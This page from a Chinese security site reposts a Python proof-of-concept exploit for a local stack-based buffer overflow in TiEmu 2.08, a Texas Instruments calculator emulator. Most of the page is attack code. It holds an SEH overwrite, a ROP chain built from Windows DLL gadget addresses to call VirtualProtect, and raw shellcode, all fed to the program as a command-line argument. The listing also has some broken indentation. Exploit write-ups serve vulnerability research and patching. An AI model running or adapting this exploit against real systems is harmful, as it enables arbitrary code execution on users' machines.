首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TiEmu 2.08 - Local Buffer Overflow
来源:juan.sacco@kpn.com 作者:Sacco 发布时间:2017-05-31  
#!/usr/bin/python
# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com
# Developed using Exploit Pack - http://exploitpack.com - <jsacco@exploitpack.com>
# Tested on: Windows 7 32 bits
#
# Description: TiEmu ( Texas Instrument Emulator ) 2.08 and prior is
# prone to a stack-based buffer overflow vulnerability because the
application fails to perform adequate
# boundary-checks on user-supplied input.
#
# What is TiEmu?
# TiEmu is a multi-platform emulator for TI89 / TI89 Titanium / TI92 / TI92+ / V200PLT hand-helds.
#
# An attacker could exploit this vulnerability to execute arbitrary code in the
# context of the application. Failed exploit attempts will result in a
# denial-of-service condition.
#
# Vendor homepage: http://lpg.ticalc.org/prj_tiemu/
 
import struct, subprocess, os
file = "C:/Program Files/TiEmu/bin/tiemu.exe"
junk =  "A" * 452
nseh = struct.pack('L', 0x06eb9090)
seh = struct.pack('L', 0x6c3010ba) # pop ebx # pop ebp # ret  -
libtifiles2-5.dll
 
def create_rop_chain():
  rop_gadgets = [
    0x75ecd264,  # POP ECX # RETN [SHELL32.DLL]
    0x711e1388,  # ptr to &VirtualProtect() [IAT COMCTL32.DLL]
    0x7549fd52,  # MOV ESI,DWORD PTR DS:[ECX] # ADD DH,DH # RETN [MSCTF.dll]
    0x628daecc,  # POP EBP # RETN [tcl84.dll]
    0x76c319b8,  # & push esp # ret  [kernel32.dll]
    0x7606c311,  # POP EAX # RETN [SHELL32.DLL]
    0xfffffdff,  # Value to negate, will become 0x00000201
    0x75de6a90,  # NEG EAX # RETN [SHLWAPI.dll]
    0x76c389d9,  # XCHG EAX,EBX # RETN [kernel32.dll]
    0x754f3b2f,  # POP EAX # RETN [MSCTF.dll]
    0xffffffc0,  # Value to negate, will become 0x00000040
    0x76b13193,  # NEG EAX # RETN [USER32.dll]
    0x76c38a09,  # XCHG EAX,EDX # RETN [kernel32.dll]
    0x757dfbf7,  # POP ECX # RETN [ole32.dll]
    0x71256c9b,  # &Writable location [COMCTL32.DLL]
    0x77048567,  # POP EDI # RETN [RPCRT4.dll]
    0x757e65e2,  # RETN (ROP NOP) [ole32.dll]
    0x76cd6ee4,  # POP EAX # RETN [kernel32.dll]
    0x90909090,  # nop
    0x76ac6d21,  # PUSHAD # RETN [OLEAUT32.dll]
  ]
  return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
 
rop_chain = create_rop_chain()
 
shellcode = "\x90"*6
shellcode += "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75"
shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53"
shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7"
 
junk2 =  "A" * 2000
 
buffer = junk  + nseh + seh + rop_chain + shellcode + junk2
 
try:
   print(buffer)
   subprocess.call([file, buffer])
except OSError as e:
   if e.errno == os.errno.ENOENT:
       print "TiEmu not found!"
   else:
print "Error executing exploit"
   raise
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·uc-http Daemon - Local File In
·Microsoft MsMpEng - Remotely E
·Octopus Deploy - Authenticated
·KEMP LoadMaster 7.135.0.13245
·CERIO DT-100G-N/DT-300N/CW-300
·TerraMaster F2-420 NAS TOS 3.0
·Google Chrome 60.0.3080.5 V8 J
·IBM Informix Dynamic Server /
·Microsoft MsMpEng - Multiple P
·ModX CMS Proof Of Concept Shel
·JAD java Decompiler 1.5.8e - L
·WebKit Document::prepareForDes
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved